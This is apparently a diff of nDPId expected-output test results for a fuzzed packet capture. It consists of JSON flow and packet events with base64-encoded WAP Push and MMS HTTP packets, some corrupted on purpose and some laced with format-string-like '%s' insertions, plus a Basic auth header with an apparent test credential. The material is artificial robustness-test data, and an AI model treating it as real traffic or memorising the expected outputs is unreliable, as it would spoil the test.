 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -114,7 +115,7 @@
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"}
 00885{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOiBjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"}
@@ -126,82 +127,82 @@
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"}
 01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"}
 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3}
 01112{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"ts_msec":1031854565547,"pkt":"AFCLk5N8CAAgsl17CABFAAIPxN5AACVzANCsFAMNrBQDBQBQCjDK9pOB5V53aFAYgywfUQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KQ29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjA0MiAxODoxNjowNTBHTVQNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk9SVU0vL0RUlCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cGFwPg0KPFplc3VsdG5vdBBmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkPMDFfMTAzMTg1NDU2MjQ4Ml8xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik9LIj4NCjxhZGRyZXNzIGFkZKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00363{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"ts_msec":1031854568982,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxOJAl0AGF7OsFAMNrBQDBQBQCi7Kxgh65UF0ElARgyyXWQAA"}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
